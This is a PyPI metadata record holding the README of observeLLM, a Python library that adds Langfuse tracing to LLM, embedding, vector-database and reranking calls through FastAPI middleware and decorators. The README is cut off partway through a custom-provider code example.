] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.5 | 2026-02-20T09:24:56.712920 | onlyone-2.4.7.tar.gz | 71,122 | e9/7b/7d16cd57d54bba3c111d2eac2f0e7a9700358dc1a30c499d6bad170da83e/onlyone-2.4.7.tar.gz | source | sdist | null | false | 07c25f0cba1f8431bb73e2bed476b04b | 444fe80f3337d3c58feb8db89ef7780eb7291734210a3c5c68f8b5f9b1d0c90b | e97b7d16cd57d54bba3c111d2eac2f0e7a9700358dc1a30c499d6bad170da83e | MIT | [
"LICENSE"
] | 228 |
2.4 | observeLLM | 1.2.10 | A python package for observing traces of your LLM application. | # ObserveLLM
A powerful observability library for AI/ML applications that provides comprehensive tracing and monitoring capabilities using Langfuse.
## Installation
Install the package from PyPI using:
```bash
pip install observeLLM
```
Note: It is recommended to use the latest version for optimal performance.
## Quick Start
### 1. Initialize Langfuse Client
First, initialize the Langfuse client at your application startup:
```python
from observe_traces import LangfuseInitializer, request_context, trace_api_call
from observe_traces import llm_tracing, llm_streaming_tracing, embedding_tracing, vectordb_tracing, reranking_tracing, general_tracing
from observe_traces import ObservabilityService
# Initialize Langfuse client
LangfuseInitializer.initialize(
langfuse_public_key='your_langfuse_public_key',
langfuse_secret_key='your_langfuse_secret_key',
langfuse_host='your_host_url', # e.g., 'http://localhost:3000'
release='app_version', # e.g., '1.0.0'
environment='your_environment' # e.g., 'development', 'production'
)
# Optional: Close Langfuse client when shutting down
LangfuseInitializer.close()
```
### 2. FastAPI Middleware Setup
Add the unified middleware to your FastAPI application in `main.py` or your entry point:
```python
from fastapi import FastAPI, Request
from observe_traces import unified_middleware, trace_api_call
app = FastAPI()
@app.middleware("http")
async def set_request_context_middleware(request: Request, call_next):
session_id = request.headers.get("X-Request-ID")
# Capture request body for trace input (optional)
body = None
if request.method in ["POST", "PUT", "PATCH"]:
try:
body = await request.json()
except:
# If body can't be parsed as JSON, you can capture it as text or skip
pass
metadata = {
"sessionId": session_id,
"environment": "development",
"serviceName": "observeLLM",
"apiEndpoint": request.url.path,
"user": request.headers.get("X-User-Email"),
**(body or {}),
}
# Optional: Define custom route names
route_mapping = {
"/api/chat": "Chat Generation",
"/api/embeddings": "Text Embedding",
"/api/rerank": "Document Reranking"
}
# Optional: Define tags for categorization and filtering
tag_mapping = {
"/api/chat": ["production", "llm", "chat"],
"/api/embeddings": ["production", "embedding", "search"],
"/api/rerank": ["production", "reranking", "search"],
"/api/health": ["monitoring", "health"]
}
# Optional: Include/exclude routes from tracing
include_routes = ["/api/chat", "/api/embeddings", "/api/rerank"]
exclude_routes = ["/health", "/metrics", "/docs"]
# Prepare input data for trace (can be request body, query params, or custom data)
trace_input = {
"method": request.method,
"path": request.url.path,
"query_params": dict(request.query_params),
"headers": dict(request.headers),
"body": body
}
return await unified_middleware(
request,
call_next,
metadata=metadata,
route_mapping=route_mapping,
tag_mapping=tag_mapping,
include_routes=include_routes,
exclude_routes=exclude_routes,
input=trace_input
)
```
**New Input Capture Feature:**
- `input`: Captures input data for traces (can be any JSON object)
- Useful for tracking request payloads, query parameters, headers, etc.
- Helps with debugging and understanding what data was provided to each trace
- Example: `{"method": "POST", "body": {"query": "Hello"}, "headers": {...}}`
**Enhanced Features:**
- `tag_mapping`: Maps route paths to lists of tags for categorization
- Tags help organize and filter traces in the Langfuse UI
- Useful for grouping traces by environment, service type, or functionality
- Example: `{"/api/chat": ["production", "llm"], "/api/embeddings": ["production", "embedding"]}`
## Usage Methods
ObserveLLM provides two ways to use the tracing decorators:
### Method 1: Direct Decorator Functions
Use the imported decorator functions directly:
```python
from observe_traces import llm_tracing, embedding_tracing, vectordb_tracing, reranking_tracing
@llm_tracing(provider='openai')
async def my_llm_function():
# Your implementation
pass
```
### Method 2: ObservabilityService Class
Create an `ObservabilityService` instance and use its methods:
```python
from observe_traces import ObservabilityService
# Create service instance
observability_service = ObservabilityService()
# Use as decorator methods
@observability_service.llm_tracing(provider='openai')
async def my_llm_function():
# Your implementation
pass
```
Both methods provide identical functionality and can be used interchangeably.
## Variable Mapping
All tracing decorators support an optional `variable_mapping` parameter that allows you to map the expected parameter names to your actual function parameter names. This is useful when your function parameters don't match the decorator's expected names.
**Important**: The mapping direction is `expected_parameter_name: your_parameter_name`
### LLM Tracing Expected Parameters
For both `llm_tracing` and `llm_streaming_tracing` decorators, the following parameters are expected:
- `model_name` (required) - The model name/identifier (fallback: `model`)
- `system_prompt` (optional) - System instructions for the model
- `chat_messages` (required) - The conversation messages/user prompt (fallback: `user_prompt`)
- `operation_name` (optional) - Custom name for the operation (used in trace naming)
- `max_tokens` (optional) - Maximum tokens to generate
- `temperature` (optional) - Sampling temperature
- `tools` (optional) - Available tools/functions for the model
**Additional decorator parameters:**
- `metadata_config` (optional) - List of metadata keys to include in traces. If None, includes all metadata.
- `is_sdk` (optional) - Boolean indicating SDK mode (True) vs standard mode (False, default). Supported for both `llm_tracing` and `llm_streaming_tracing` decorators.
**Note**: The decorator will automatically try fallback parameter names if the primary ones are not found. For example, if `model_name` is not provided, it will look for `model`. If `chat_messages` is not found, it will look for `user_prompt`.
```python
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@observability_service.llm_tracing(
provider='openai',
variable_mapping={
'model_name': 'model', # Maps decorator's 'model_name' to your 'model' parameter
'chat_messages': 'user_prompt', # Maps decorator's 'chat_messages' to your 'user_prompt' parameter
'system_prompt': 'system_msg', # Maps decorator's 'system_prompt' to your 'system_msg' parameter
'operation_name': 'task_name', # Maps decorator's 'operation_name' to your 'task_name' parameter
'max_tokens': 'max_length', # Maps decorator's 'max_tokens' to your 'max_length' parameter
'temperature': 'temp', # Maps decorator's 'temperature' to your 'temp' parameter
'tools': 'available_tools' # Maps decorator's 'tools' to your 'available_tools' parameter
}
)
async def my_custom_llm_function(model, system_msg, user_prompt, task_name=None, max_length=None, temp=None, available_tools=None, **kwargs):
# Your implementation here
pass
# Example for streaming LLM with metadata filtering
@observability_service.llm_streaming_tracing(
provider='anthropic',
variable_mapping={
'model_name': 'model',
'chat_messages': 'messages',
'system_prompt': 'system',
'operation_name': 'stream_name',
'max_tokens': 'max_output_tokens',
'temperature': 'temp_setting',
'tools': 'function_tools'
},
metadata_config=['model', 'provider', 'timeTaken', 'totalCost'],
is_sdk=False
)
async def my_custom_streaming_function(model, system, messages, stream_name=None, max_output_tokens=None, temp_setting=None, function_tools=None, **kwargs):
# Your streaming implementation here with filtered metadata
pass
```
**Note**: If you don't provide variable mapping, your function parameters must match the expected parameter names exactly. For example:
```python
@observability_service.llm_tracing(provider='openai')
async def standard_llm_function(model_name, system_prompt, chat_messages, operation_name=None, max_tokens=None, temperature=None, tools=None, **kwargs):
# Function parameters match expected names exactly
pass
```
### Other Decorator Mappings
The mapping works for all decorator types:
- **LLM Tracing**: Maps `model_name`, `system_prompt`, `chat_messages`, `operation_name`, `max_tokens`, `temperature`, `tools`
- **Embedding Tracing**: Maps `model_name`, `inputs`, `texts`, etc.
- **Vector DB Tracing**: Maps `namespace`, `query`, `index_host`, `top_k`, etc.
- **Reranking Tracing**: Maps `model_name`, `query`, `documents`, `top_n`, etc.
## Tracing Decorators
ObserveLLM provides six powerful decorators and utility functions to enable comprehensive tracing for different AI/ML components:
### 1. LLM Tracing
```python
from observe_traces import llm_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@llm_tracing(provider='openai') # Direct function
# OR
@observability_service.llm_tracing(provider='openai') # Service method
async def llm_api_calling_function(
model_name: str, # Required: e.g., 'gpt-3.5-turbo'
system_prompt: str, # Optional: System instructions
chat_messages: list, # Required: Conversation history
operation_name: str = None, # Optional: Custom operation name for tracing
max_tokens: int = None, # Optional: Maximum tokens to generate
temperature: float = None, # Optional: Sampling temperature
tools: list = None, # Optional: Available tools/functions
**kwargs # Additional parameters
):
# Your LLM API calling logic here
# Returns either:
# 1. Tuple of (response_data, raw_response)
# 2. Raw response object
# Example with metadata filtering
@llm_tracing(
provider='openai',
metadata_config=['maxTokens', 'temperature', 'totalCost'] # Only include specific metadata
)
async def cost_focused_llm_function(model_name, chat_messages, **kwargs):
# Only 'maxTokens', 'temperature', and 'totalCost' will be included in trace metadata
pass
# SDK Mode Support (OpenAI and Anthropic)
@llm_tracing(provider='openai', is_sdk=True) # SDK mode for OpenAI
async def openai_sdk_function(model_name, chat_messages, **kwargs):
# Use OpenAI SDK directly - returns complete SDK response object
from openai import AsyncOpenAI
client = AsyncOpenAI()
response = await client.chat.completions.create(
model=model_name,
messages=chat_messages,
tools=kwargs.get('tools', [])
)
return response # Return SDK response object directly
@llm_tracing(provider='anthropic', is_sdk=True) # SDK mode for Anthropic
async def anthropic_sdk_function(model_name, chat_messages, **kwargs):
# Use Anthropic SDK directly - returns complete SDK response object
from anthropic import AsyncAnthropic
client = AsyncAnthropic()
response = await client.messages.create(
model=model_name,
messages=chat_messages,
tools=kwargs.get('tools', [])
)
return response # Return SDK response object directly
@llm_tracing(provider='openai', is_sdk=False) # Standard mode (default)
async def openai_standard_function(model_name, chat_messages, **kwargs):
# Use raw HTTP requests - returns tuple (response_text, raw_json_response)
import httpx
async with httpx.AsyncClient() as client:
response = await client.post(
"https://api.openai.com/v1/chat/completions",
json={"model": model_name, "messages": chat_messages},
headers={"Authorization": f"Bearer {api_key}"}
)
raw_json = response.json()
text = raw_json["choices"][0]["message"]["content"]
return text, raw_json # Return tuple
```
**`is_sdk` Parameter for LLM Tracing:**
The `is_sdk` parameter determines how the decorator processes function returns:
- **`is_sdk=False` (default)**: Standard mode - expects raw HTTP API responses, typically returned as tuple `(response_text, raw_json_response)`
- **`is_sdk=True`**: SDK mode - expects complete SDK response objects (e.g., OpenAI `ChatCompletion` or Anthropic `Message` objects)
**SDK Mode Benefits:**
- Direct extraction of token usage, tool calls, and metadata from SDK objects
- Enhanced tool call support with comprehensive metadata
- Simplified integration with official SDKs
- Automatic handling of complex response structures
Supported LLM Providers:
- OpenAI (GPT-3.5, GPT-4, GPT-4o, etc.) - SDK mode supported
- Anthropic (Claude models) - SDK mode supported
- Groq
- Custom providers can be added using `register_provider()`
### 2. LLM Streaming Tracing
```python
from observe_traces import llm_streaming_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
import json
@llm_streaming_tracing(provider='anthropic', is_sdk=False) # Direct function
# OR
@observability_service.llm_streaming_tracing(provider='anthropic', is_sdk=False) # Service method
async def llm_streaming_function(
model_name: str, # Required: e.g., 'claude-3-opus-20240229'
system_prompt: str, # Optional: System instructions
chat_messages: list, # Required: Conversation history
operation_name: str = None, # Optional: Custom operation name for tracing
max_tokens: int = None, # Optional: Maximum tokens to generate
temperature: float = None, # Optional: Sampling temperature
tools: list = None, # Optional: Available tools/functions
**kwargs # Additional parameters
):
# Your streaming LLM API calling logic here
# Should be an async generator that yields specific formatted lines:
# 1. For streaming response chunks:
# yield f"data: {json.dumps({'type': 'data', 'data': chunk_text})}"
# Example:
# yield 'data: {"type": "data", "data": "Hello"}'
# 2. For token usage information:
# yield f"tokens: {json.dumps({'data': {'input': input_tokens, 'output': output_tokens}})}"
# Example:
# yield 'tokens: {"data": {"input": 10, "output": 5}}'
# 3. Any other lines that should be passed through unchanged
# The decorator will:
# - Collect all response chunks to build the complete response
# - Track token usage throughout the stream
# - Calculate costs based on token usage
# - Create a trace in Langfuse with the complete response and metrics
# SDK Mode for Complete Response Objects
@llm_streaming_tracing(provider='anthropic', is_sdk=True)
async def llm_sdk_function(
model_name: str,
chat_messages: list,
**kwargs
):
# Your LLM SDK calling logic here that returns a complete response object
# Example SDK response structure:
# {
# "id": "msg_01...",
# "content": [
# {"type": "text", "text": "Response content"},
# {"type": "tool_use", "id": "toolu_01...", "name": "tool_name", "input": {...}}
# ],
# "usage": {"input_tokens": 10, "output_tokens": 20},
# "stop_reason": "end_turn"
# }
return complete_response_object
# Streaming with metadata filtering
@llm_streaming_tracing(
provider='anthropic',
is_sdk=False,
metadata_config=['provider', 'model', 'totalCost', 'hasToolCalls']
)
async def focused_streaming_function(model_name, chat_messages, **kwargs):
# Only specified metadata fields will be included in the trace
async for chunk in streaming_api_call():
yield chunk
```
**is_sdk Parameter:**
The `is_sdk` parameter determines how the decorator handles the function's return value:
- **`is_sdk=False` (default)**: Streaming mode - expects an async generator that yields formatted chunks
- **`is_sdk=True`**: SDK mode - expects an async generator that yields streaming data and special final message events
**Streaming Mode (`is_sdk=False`):**
- Function must be an async generator yielding chunks
- Processes streaming events in real-time
- Collects chunks to build complete response
- Parses token usage from streaming events
**SDK Mode (`is_sdk=True`):**
- Function must be an async generator that yields streaming data in real-time
- Yields streaming text chunks during the LLM response
- Yields a special `anthropic_final_message` event at the end with complete response data
- The decorator automatically detects this special event and extracts trace data from it
- Combines real-time streaming with comprehensive tracing
### SDK Mode Implementation Example
```python
import json
from anthropic import AsyncAnthropic
@llm_streaming_tracing(provider='anthropic', is_sdk=True)
async def sdk_streaming_function(model_name, chat_messages, system_prompt=None, **kwargs):
"""
SDK Mode function that yields streaming data and final message for tracing.
This function:
1. Streams text chunks in real-time using the Anthropic SDK
2. Yields a special anthropic_final_message event with complete response data
3. The decorator automatically processes this event for comprehensive tracing
"""
client = AsyncAnthropic(api_key="your-api-key")
try:
# Stream the response using Anthropic SDK
async with client.messages.stream(
model=model_name,
max_tokens=kwargs.get('max_tokens', 1024),
system=system_prompt,
messages=chat_messages,
temperature=kwargs.get('temperature', 0.7),
tools=kwargs.get('tools', []) # Include tools if provided
) as stream:
# Yield streaming text chunks in real-time
async for text in stream.text_stream:
yield f"data: {json.dumps({'type': 'text_chunk', 'text': text})}\n\n"
# Get the final message with complete response data
final_message = await stream.get_final_message()
# Convert to dict for the special event
final_message_dict = final_message.model_dump()
# Yield the special anthropic_final_message event
# The decorator will detect this and extract tracing data
yield f"data: {json.dumps({'type': 'anthropic_final_message', 'data': final_message_dict})}\n\n"
# Optional: yield completion event
yield f"data: {json.dumps({'type': 'stream_complete', 'message': 'SDK streaming completed'})}\n\n"
except Exception as e:
yield f"data: {json.dumps({'type': 'error', 'error': str(e)})}\n\n"
# Usage in FastAPI endpoint
@app.post("/stream/sdk-mode")
async def stream_with_sdk_mode(request: StreamingRequest):
async def generate():
async for chunk in sdk_streaming_function(
model_name=request.model,
system_prompt=request.system_prompt,
chat_messages=[{"role": msg.role, "content": msg.content} for msg in request.messages],
max_tokens=request.max_tokens,
temperature=0.7,
tools=[{"name": "weather", "description": "Get weather info"}] # Optional tools
):
yield chunk
return StreamingResponse(
generate(),
media_type="text/plain",
headers={"Cache-Control": "no-cache", "Connection": "keep-alive"}
)
```
**Key Benefits of SDK Mode (`is_sdk=True`):**
- **Real-time streaming**: Users see text appearing as it's generated
- **Comprehensive tracing**: Complete response data, token usage, costs, and tool calls are captured
- **Tool call support**: Handles complex responses with tool calls and multiple content blocks
- **Error handling**: Proper error propagation while maintaining streaming capability
- **Automatic processing**: The decorator handles trace creation from the final message event
## Metadata Configuration
All tracing decorators support an optional `metadata_config` parameter that allows you to control which metadata fields are included in your traces. This feature provides fine-grained control over trace payloads and helps focus on specific metrics.
### Usage
```python
# Include only specific metadata fields
@llm_tracing(provider='openai', metadata_config=['maxTokens', 'temperature', 'totalCost'])
async def focused_llm_function(model_name, chat_messages, **kwargs):
pass
# Include all metadata (default behavior)
@llm_tracing(provider='openai') # metadata_config=None
async def full_metadata_function(model_name, chat_messages, **kwargs):
pass
# Include no metadata
@llm_tracing(provider='openai', metadata_config=[])
async def minimal_metadata_function(model_name, chat_messages, **kwargs):
pass
```
### Available Metadata Fields
**LLM Tracing (`llm_tracing` and `llm_streaming_tracing`):**
- `model` - Model name/identifier
- `provider` - LLM provider name
- `maxTokens` - Maximum tokens to generate
- `temperature` - Sampling temperature
- `tool` - Available tools/functions
- `timeTaken` - Response time in seconds
- `inputTokens` - Number of input tokens
- `outputTokens` - Number of output tokens
- `inputCost` - Cost for input tokens
- `outputCost` - Cost for output tokens
- `totalCost` - Total cost for the request
- `hasToolCalls` - Whether tool calls were made
- `toolCallCount` - Number of tool calls
- `sdkMode` - Whether SDK mode was used (streaming only)
- `currentStreamHasToolCalls` - Tool calls in current stream (streaming only)
- `currentStreamToolCallCount` - Tool call count in current stream (streaming only)
- `originalResponse` - Full raw response from the LLM, use this field wisely
and many more.....
**Embedding Tracing (`embedding_tracing`):**
- `provider` - Embedding provider name
- `model_name` - Model name/identifier
- `input count` - Number of input texts
- `cost` - Total cost for embeddings
- `token usage` - Number of tokens used
- `price` - Detailed pricing information
- `embedding_dimensions` - Dimensionality of embeddings
- `timestamp` - Timestamp of the operation
**Vector DB Tracing (`vectordb_tracing`):**
- `operation_type` - Type of operation (read/write)
- `provider` - Vector DB provider name
- `cost` - Operation cost
- `read_units` - Number of read units consumed
- `index_host` - Vector database host
- `namespace` - Vector database namespace
- `top_k` - Number of results requested (read operations)
- `upserted_vectors` - Number of vectors upserted (write operations)
**Reranking Tracing (`reranking_tracing`):**
- `provider` - Reranking provider name
- `model_name` - Model name/identifier
- `output_count` - Number of documents processed
- `cost` - Total cost for reranking
- `token usage` - Number of tokens used
- `timestamp` - Timestamp of the operation
- `top_n` - Number of top results requested
### Common Use Cases
```python
# Cost tracking focus
@llm_tracing(
provider='openai',
metadata_config=['inputCost', 'outputCost', 'totalCost', 'inputTokens', 'outputTokens']
)
async def cost_monitoring_function(model_name, chat_messages, **kwargs):
pass
# Performance tracking focus
@llm_tracing(
provider='anthropic',
metadata_config=['timeTaken', 'inputTokens', 'outputTokens', 'model']
)
async def performance_monitoring_function(model_name, chat_messages, **kwargs):
pass
# Tool usage tracking
@llm_streaming_tracing(
provider='anthropic',
metadata_config=['hasToolCalls', 'toolCallCount', 'currentStreamHasToolCalls', 'tool']
)
async def tool_monitoring_function(model_name, chat_messages, tools, **kwargs):
pass
# Minimal metadata for compliance
@embedding_tracing(
provider='openai',
metadata_config=['provider', 'model_name']
)
async def compliance_focused_embedding(model_name, inputs, **kwargs):
pass
```
### Benefits
- **Reduced payload size**: Include only necessary metadata to minimize trace size
- **Focused monitoring**: Track specific metrics relevant to your use case
- **Performance optimization**: Smaller payloads improve query and dashboard performance
- **Compliance support**: Exclude sensitive metadata fields when required
- **Cost optimization**: Reduce storage and bandwidth costs for traces
### 3. Embedding Tracing
```python
from observe_traces import embedding_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@embedding_tracing(provider='openai') # Direct function
# OR
@observability_service.embedding_tracing(provider='openai') # Service method
async def embedding_generation_function(
model_name: str, # e.g., 'text-embedding-ada-002'
inputs: list, # List of texts to embed
**kwargs # Additional parameters
):
# Your embedding API calling logic here
# Returns either:
# 1. Tuple of (embeddings, raw_response)
# 2. Raw response object
```
Supported Embedding Providers:
- OpenAI
- Pinecone
- Cohere
- Jina
- VoyageAI
- Custom providers can be added using `register_embedding_provider()`
### 4. Vector Database Tracing
```python
from observe_traces import vectordb_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
# For write operations
@vectordb_tracing(provider='pinecone', operation_type='write') # Direct function
# OR
@observability_service.vectordb_tracing(provider='pinecone', operation_type='write') # Service method
async def vectordb_write_function(
index_host: str,
vectors: list,
namespace: str
):
# Your vector DB write logic here
# Returns raw response object
# For read operations
@vectordb_tracing(provider='pinecone', operation_type='read') # Direct function
# OR
@observability_service.vectordb_tracing(provider='pinecone', operation_type='read') # Service method
async def vectordb_read_function(
index_host: str,
namespace: str,
top_k: int,
query: str,
query_vector_embeds: list,
query_sparse_embeds: dict = None,
include_metadata: bool = True,
filter_dict: dict = None
):
# Your vector DB read logic here
# Returns raw response object
```
Supported Vector DB Providers:
- Pinecone
- Custom providers can be added by extending the provider configurations
### 5. API Call Tracing
```python
from observe_traces import trace_api_call
from fastapi import Request
@app.get("/some-endpoint")
async def example_endpoint(request: Request):
# Your API logic here
input_data = {"param1": "value1", "param2": "value2"}
# Perform some operation
result = some_function(input_data)
# Log the API call within the request trace
span_id = trace_api_call(
request=request,
name="Example API Call",
input_data=input_data,
output_data=result,
metadata={"additional_info": "some value"}
)
return result
```
This function allows you to create spans within existing traces to track API calls with:
- Complete input/output data
- Custom metadata
- Integration with the request tracing system
### 6. Reranking Tracing
```python
from observe_traces import reranking_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@reranking_tracing(provider='cohere') # Direct function
# OR
@observability_service.reranking_tracing(provider='cohere') # Service method
async def reranking_function(
model_name: str,
query: str,
documents: list,
top_n: int,
**kwargs
):
# Your reranking API calling logic here
# Returns either:
# 1. Tuple of (rerank_results, raw_response)
# 2. Raw response object
```
Supported Reranking Providers:
- Cohere
- Pinecone
- Jina
- VoyageAI
- Custom providers can be added using `register_reranking_provider()`
### 6. General Tracing
```python
from observe_traces import general_tracing
# OR
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
@general_tracing() # Direct function
# OR
@observability_service.general_tracing() # Service method
async def any_function(
param1: Any, # Any function parameters
param2: Any, # The decorator is completely agnostic
**kwargs # Additional parameters
):
# Your function logic here
# Returns any value or None
```
The `general_tracing` decorator is a **powerful, agnostic tracing solution** that can trace any Python function regardless of its purpose. It automatically captures:
- Function arguments as input
- Return values as output (or captured results for functions without return values)
- Execution timing and metadata
- **Parent-child relationships for nested function calls**
- Error handling and exception information
**Key Features:**
#### **Case 1: Normal Functions with Return Values**
```python
from observe_traces import general_tracing
@general_tracing()
async def process_data(data: dict, operation: str) -> dict:
"""Function that returns a result."""
processed = {"operation": operation, "result": data["value"] * 2}
return processed
# Usage in an endpoint
@app.post("/process")
async def process_endpoint(request: ProcessRequest):
result = await process_data(request.data, "multiply")
return {"success": True, "result": result}
```
#### **Case 2: Functions Without Return Values (using capture_result)**
```python
from observe_traces import general_tracing, capture_result
@general_tracing()
async def log_operation(user_id: str, action: str) -> None:
"""Function that doesn't return anything but captures results."""
log_entry = {
"user_id": user_id,
"action": action,
"timestamp": datetime.now().isoformat(),
"status": "completed"
}
# Store in database (no return value)
database.insert_log(log_entry)
# Capture the result for tracing
capture_result(log_entry)
# Usage in an endpoint
@app.post("/log")
async def log_endpoint(request: LogRequest):
await log_operation(request.user_id, request.action)
return {"success": True, "message": "Action logged"}
```
#### **Case 3: Custom Span Names**
```python
@general_tracing(name="Data Processing Pipeline")
async def complex_data_processing(input_data: list) -> dict:
"""Function with custom span name instead of function name."""
# Your processing logic
return {"processed_count": len(input_data)}
```
#### **Case 4: Metadata Filtering**
```python
@general_tracing(metadata_config=["functionName", "timeTaken", "hasReturn", "argumentCount"])
async def optimized_function(large_data: dict) -> dict:
"""Function with filtered metadata to reduce trace payload size."""
# Only specified metadata fields will be included in the trace
return {"status": "processed"}
```
**Available Metadata Fields:**
- `functionName` - Name of the traced function
- `timeTaken` - Execution time in seconds
- `hasReturn` - Whether function returns a value
- `hasCapturedResult` - Whether capture_result() was used
- `argumentCount` - Number of function arguments
- `isAsync` - Whether function is async
- `module` - Function's module name
- `hasError` - Whether an error occurred (error cases only)
- `errorType` - Type of error (error cases only)
#### **Case 5: Nested Functions (Parent-Child Relationships)**
```python
@general_tracing(name="Main Workflow")
async def main_workflow(task_id: str) -> dict:
"""Parent function that calls multiple child functions."""
# Step 1: Validate input
validation_result = await validate_input(task_id)
# Step 2: Process data
processing_result = await process_task_data(task_id, validation_result)
# Step 3: Generate report
await generate_task_report(task_id, processing_result)
return {
"task_id": task_id,
"status": "completed",
"validation": validation_result,
"processing": processing_result
}
@general_tracing(name="Input Validation")
async def validate_input(task_id: str) -> dict:
"""Child function - automatically nested under parent span."""
return {"task_id": task_id, "valid": True}
@general_tracing(name="Data Processing")
async def process_task_data(task_id: str, validation: dict) -> dict:
"""Child function - automatically nested under parent span."""
return {"task_id": task_id, "processed_items": 42}
@general_tracing(name="Report Generation")
async def generate_task_report(task_id: str, data: dict) -> None:
"""Child function without return value."""
report = {"task_id": task_id, "summary": data, "generated_at": datetime.now()}
capture_result(report)
```
This creates a **hierarchical trace structure** in Langfuse:
```
📊 Trace: Main Workflow
├── 🟦 Main Workflow (parent span)
│ ├── 🟦 Input Validation (child span)
│ ├── 🟦 Data Processing (child span)
│ └── 🟦 Report Generation (child span)
```
#### **Case 6: ObservabilityService Class Usage**
```python
from observe_traces import ObservabilityService
# Create service instance
observability_service = ObservabilityService()
@observability_service.general_tracing(name="Service Method")
async def service_function(data: list) -> dict:
"""Using ObservabilityService instead of direct decorator."""
processed = [item * 2 for item in data]
return {"processed": processed, "count": len(processed)}
```
#### **Case 7: Error Handling**
```python
@general_tracing(name="Error Prone Function")
async def risky_operation(data: dict) -> dict:
"""Function that might throw errors - automatically traced."""
if not data.get("valid"):
raise ValueError("Invalid data provided")
return {"status": "success", "data": data}
# Errors are automatically captured in span metadata and output
```
**Complete FastAPI Example:**
```python
from fastapi import FastAPI, Request
from observe_traces import (
LangfuseInitializer,
general_tracing,
capture_result,
unified_middleware
)
app = FastAPI()
# Initialize Langfuse
LangfuseInitializer.initialize(
langfuse_public_key="your_key",
langfuse_secret_key="your_secret",
langfuse_host="your_host"
)
# Add middleware for tracing context
@app.middleware("http")
async def tracing_middleware(request: Request, call_next):
metadata = {
"sessionId": request.headers.get("X-Session-ID", "default"),
"user": request.headers.get("X-User-Email", "anonymous"),
"environment": "production"
}
return await unified_middleware(request, call_next, metadata=metadata)
# Traced business logic functions
@general_tracing(name="Order Validation")
async def validate_order(order_data: dict) -> dict:
# Validation logic
return {"valid": True, "order_id": order_data["id"]}
@general_tracing(name="Payment Processing")
async def process_payment(order_id: str, amount: float) -> dict:
# Payment logic
return {"transaction_id": "txn_123", "status": "completed"}
@general_tracing(name="Inventory Update")
async def update_inventory(order_data: dict) -> None:
# Inventory logic (no return value)
inventory_update = {
"items_updated": len(order_data["items"]),
"timestamp": datetime.now().isoformat()
}
capture_result(inventory_update)
@general_tracing(name="Complete Order Workflow")
async def complete_order(order_data: dict) -> dict:
"""Main workflow with nested function calls."""
# Step 1: Validate order
validation = await validate_order(order_data)
# Step 2: Process payment
payment = await process_payment(order_data["id"], order_data["total"])
# Step 3: Update inventory
await update_inventory(order_data)
return {
"order_id": order_data["id"],
"status": "completed",
"validation": validation,
"payment": payment
}
# API endpoint
@app.post("/orders/complete")
async def complete_order_endpoint(order_request: OrderRequest):
result = await complete_order(order_request.dict())
return {"success": True, "result": result}
```
**Important Requirements:**
⚠️ **The general tracing decorator requires the unified middleware to work properly:**
1. **Middleware Setup**: Must use `unified_middleware` in your FastAPI application
2. **HTTP Requests**: Tracing only works via HTTP endpoints, not direct function calls
3. **Request Headers**: Include `X-Session-ID` and `X-User-Email` for better tracing context
**Benefits of General Tracing:**
- ✅ **Universal Compatibility**: Works with any Python function
- ✅ **Automatic Nesting**: Preserves parent-child relationships
- ✅ **Flexible Output Capture**: Supports both return values and captured results
- ✅ **Performance Monitoring**: Automatic timing and metadata collection
- ✅ **Error Tracking**: Comprehensive error information capture
- ✅ **Payload Optimization**: Configurable metadata filtering
- ✅ **Easy Integration**: Works alongside existing LLM, embedding, and vector DB tracers
## Custom Provider Registration
You can register custom providers using either approach:
### Using Direct Functions
```python
from observe_traces import register_provider, register_embedding_provider, register_reranking_provider
# Register custom LLM provider
register_provider(
provider_name="my_custom_llm",
token_parser=my_token_parser_function,
response_extractor=my_response_extractor_function
)
# Register custom embedding provider
register_embedding_provider(
provider_name="my_custom_embedding",
token_parser=my_token_parser_function,
price_calculator=my_price_calculator_function,
embeddings_extractor=my_embeddings_extractor_function
)
```
### Using ObservabilityService
```python
from observe_traces import ObservabilityService
observability_service = ObservabilityService()
# Register custom providers
observability_service.register_llm_provider("my_custom_llm", my_custom_provider_instance)
observability_service.register_embedding_provider("my_custom_embedding", my_embedding_provider_instance)
observability_service.register_vectordb_provider("my_custom_vectordb", my_vectordb_provider_instance)
observability_service.register_reranking_provider("my_custom_reranking", my_reranking_provider_instance)
```
### Creating Custom Providers with Base Classes
For maximum customization, you can extend the base provider classes:
```python
from typing import Any, Dict, List
from observe_traces import ObservabilityService, LLMProvider, EmbeddingProvider
class MyCustomLLMProvider(LLMProvider):
"""Custom LLM provider implementation."""
def __init__(self):
super().__init__("my-custom-llm", self._extract_response)
def parse_tokens(self, response_data: Dict[str, Any]) -> Dict[str, int]:
"""Parse tokens from your API response."""
return {
"prompt_tokens": response_data.get("input_tokens", 0),
"completion_tokens": response_data.get("output_tokens", 0),
"total_tokens": response_data.get("total_tokens", 0)
}
def calculate_cost(self, tokens_data: Dict[str, int], model_name: str) -> Dict[str, float]:
"""Calculate cost based on your pricing model."""
input_cost = tokens_data.get("prompt_tokens", 0) * 0.00001 # Your pricing
output_cost = tokens_data.get("completion_tokens", 0) * 0.00002
return {
"input": input_cost,
"output": output_cost,
"total": input_cost + output_cost
}
def _extract_response(self, d | text/markdown | TapanKheni10 | tapankheni10304@gmail.com | null | null | MIT | null | [
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Operating System :: OS Independent"
] | [] | https://github.com/TapanKheni10/observe_traces | null | >=3.9 | [] | [] | [] | [
"ensure==1.0.2",
"py-youtube==1.1.7",
"pytest>=7.1.3; extra == \"testing\"",
"mypy>=0.971; extra == \"testing\"",
"flake8>=5.0.4; extra == \"testing\"",
"tox>=3.25.1; extra == \"testing\"",
"black>=22.8.0; extra == \"testing\""
] | [] | [] | [] | [
"Bug Tracker, https://github.com/TapanKheni10/observe_traces/issues"
